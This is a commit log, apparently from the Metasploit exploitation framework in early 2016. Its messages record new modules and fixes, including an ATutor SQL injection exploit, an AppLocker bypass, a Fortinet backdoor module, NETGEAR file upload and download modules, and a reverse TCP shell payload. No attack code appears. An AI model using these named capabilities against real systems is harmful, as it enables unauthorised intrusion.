2016-03-06 22:06:27 -06:00
Brent Cook
a2c3b05416
Land #6405, prefer default module base class of simply 'Metasploit'
2016-03-06 17:10:55 -06:00
Brent Cook
8faae94338
Land #6592, make linux/x86/shell_reverse_tcp's shell path configurable and remove shell_reverse_tcp2
2016-03-06 15:33:53 -06:00
Brent Cook
66c697d2e4
Land #6602, update author info for dahua_dvr_auth_bypass
2016-03-06 15:13:01 -06:00
Brent Cook
4711191def
remove non-specific URL
2016-03-06 15:12:25 -06:00
Brent Cook
a1190f4344
Land #6598, add post module for setting wallpaper
2016-03-06 15:00:10 -06:00
Brent Cook
86845222ef
add meterpreter platform workaround
2016-03-06 14:51:34 -06:00
Brent Cook
c7c0e12bb3
remove various module hacks for the datastore defaults not preserving types
2016-03-05 23:11:39 -06:00
Meatballs
c7f9fbcdfa
Change to enable/disable
2016-03-06 04:31:24 +00:00
Meatballs
6b510005da
Reverse os checks
2016-03-06 04:31:23 +00:00
Meatballs
0e52fda708
Initial tidy
2016-03-06 04:31:23 +00:00
Fakhri Zulkifli
b1e9f44ca2
IPv6 Neighbor Advertisement Enhancement
...
http://seclists.org/nmap-dev/2011/q2/79
1. Shorten router advertisement payload lifetime.
2. Randomize address prefix.
3. Prevent from getting into default router list.
2016-03-06 03:23:37 +08:00
William Vu
71b034a566
Land #6627, atutor_sqli regex fix
2016-03-03 16:54:38 -06:00
wchen-r7
ba4e0d304b
Do regex \d+ instead
2016-03-03 11:05:16 -06:00
Brent Cook
d355b0e8b7
update payload sizes
2016-03-02 13:55:32 -06:00
wchen-r7
22b69c8dee
Land #6588, Add AppLocker Execution Prevention Bypass module
2016-03-01 22:30:23 -06:00
wchen-r7
a798581fa3
Update #get_dotnet_path
2016-03-01 22:25:40 -06:00
net-ninja
cda4c6b3b3
Update the regex for the number of students in ATutor
2016-03-01 09:41:17 -06:00
rwhitcroft
ded5b58733
one more style fix
2016-03-01 10:20:39 -05:00
rwhitcroft
4b10331cf0
style fixups
2016-03-01 10:18:25 -05:00
wchen-r7
5d64346a63
Land #6623, Add CVE-2016-2555: ATutor 2.2.1 SQL Injection Exploit Module
2016-02-29 19:33:25 -06:00
Jay Turla
62a611a472
Adding PHP Utility Belt Remote Code Execution
2016-03-01 09:22:25 +08:00
wchen-r7
274b9acb75
rm #push
2016-02-29 18:58:05 -06:00
wchen-r7
f55835cceb
Merge new code changes from mr_me
2016-02-29 18:39:52 -06:00
wchen-r7
638d91197e
Override print_* to always print the IP and port
2016-02-29 16:18:03 -06:00
wchen-r7
54ede19150
Use FileDropper to cleanup
2016-02-29 16:15:50 -06:00
wchen-r7
727a119e5b
Report cred
2016-02-29 16:06:31 -06:00
wchen-r7
4cc690fd8d
Let the user specify username/password
2016-02-29 15:45:33 -06:00
wchen-r7
726c1c8d1e
There is no http_send_command, so I guess the check should not work
2016-02-29 15:43:47 -06:00
William Vu
c5a9d59455
Land #6612, one final missing change
2016-02-29 15:08:42 -06:00
William Vu
cb0493e5bb
Recreate Msf::Exploit::Remote::Fortinet
...
To match the path, even though it's kinda lame including it just for the
monkeypatch.
2016-02-29 15:04:02 -06:00
net-ninja
a3fa57c8f6
Add CVE-2016-2555: ATutor 2.2.1 SQL Injection Exploit Module
2016-02-29 14:59:26 -06:00
Brent Cook
8c2ce9687a
Land #6620, fix typo in jtr_linux
2016-02-29 14:58:58 -06:00
Brent Cook
d955c6a8f6
style fixes
2016-02-29 14:06:49 -06:00
William Vu
a6a37b3089
Land #6612, missing commits included
2016-02-29 14:06:21 -06:00
wchen-r7
f5ad1286d2
Fix #6615, fix typo "format"
...
Fix #6615
2016-02-29 12:44:25 -06:00
William Vu
300fdc87bb
Move Fortinet backdoor to module and library
2016-02-29 12:06:33 -06:00
wchen-r7
2950996cb8
Land #6612, Add aux module for Fortinet backdoor
2016-02-29 12:02:49 -06:00
William Vu
53d703355f
Move Fortinet backdoor to module and library
2016-02-29 11:57:42 -06:00
rwhitcroft
f735a904ff
create owa_ews_login module, modify HttpClient to accept preferred_auth option
2016-02-28 22:01:05 -05:00
wchen-r7
53ff3051e1
Land #6531, NETGEAR ProSafe Network Management System 300 auth'd File Download
2016-02-26 10:53:16 -06:00
wchen-r7
bc050410a6
Allow max traversal depth as an option, and report cred
2016-02-26 10:52:30 -06:00
wchen-r7
7731fbf48f
Land #6530, NETGEAR ProSafe Network Management System 300 File Upload
2016-02-26 10:39:09 -06:00
Brent Cook
89b0c8a27a
Land #6571, use intent to unlock Android screens, support <= 4.3
2016-02-26 05:55:35 -06:00
wchen-r7
6188da054d
Remove //
2016-02-25 22:20:48 -06:00
wchen-r7
051506694f
Land #6574, add Linknat Vos Manager Traversal aux module
2016-02-25 22:02:56 -06:00
wchen-r7
f3cf5a8a41
Resolve merge conflict with upstream-master
...
Out of date author field
2016-02-25 14:49:53 -06:00
wchen-r7
d14ec657e2
Land #6564, Add Apache Karaf Command Execution Module
2016-02-25 14:47:40 -06:00
wchen-r7
1d2ec7a239
Rescue OpenSSL::Cipher::CipherError
...
Our current net/ssh library is out of date, so we need to rescue
OpenSSL::Cipher::CipherError.
2016-02-25 14:46:53 -06:00
wchen-r7
2e268a25da
Land #6596, Apache Karaf Login Utility
2016-02-25 14:39:51 -06:00
wchen-r7
aa7c3f01a8
Update name and description
2016-02-25 14:39:19 -06:00
wchen-r7
7e25c7b87b
Handle OpenSSL::Cipher::CipherError
...
Our current net/ssh is pretty outdated, so it is possible not being
able to connect to certain SSH servers.
2016-02-25 14:35:37 -06:00
William Vu
7d20e26a35
Move to aux/scanner/ssh
2016-02-25 11:22:50 -06:00
William Vu
f52f44cde0
Remove session_setup, since we're not in a shell
...
A real shell. A real human bean.
2016-02-25 11:21:45 -06:00
nixawk
6ef4026698
get_ptr - save_note(ip, 'get_ptr', records)
2016-02-25 21:43:13 +08:00
nixawk
dfff94a243
save ip/domain relationships
2016-02-25 21:14:40 +08:00
Tyler Bennett
ff3a554b4d
added an unless to wrap around the print and report_creds func for nas module to only execute if ftpuser and ftppass is non-blank
2016-02-24 13:53:30 -05:00
Tyler Bennett
16d7b2e6ff
cleaned up unless code for nas module and setup ftpuser and ftppass to only if non blank
2016-02-23 17:37:47 -05:00
dmohanty-r7
6aa6280eff
Try USERNAME before DEFAULTCRED
2016-02-23 13:44:44 -06:00
Tyler Bennett
4eabe43273
fixed issues with capturing regex
2016-02-23 12:27:07 -05:00
Tyler Bennett
c191e5b8e1
corrected authors file and cleaned up debug statements
2016-02-23 11:41:12 -05:00
Jon Hart
c79eab2c7f
Land #6241, @talos-arch3y's aux module for Dahua DVR CVE-2013-6117
2016-02-23 08:20:54 -08:00
nixawk
f0da8e9adf
bing_search - ConnectionTimeout
2016-02-23 18:56:34 +08:00
Pedro Ribeiro
5710c85a9e
Style changes
2016-02-23 15:15:57 +07:00
Pedro Ribeiro
044b12d3a4
Made style changes requested by OJ and others
2016-02-23 15:14:04 +07:00
dmohanty-r7
07ac13326e
Allow user to try other login credentials
2016-02-22 17:47:32 -06:00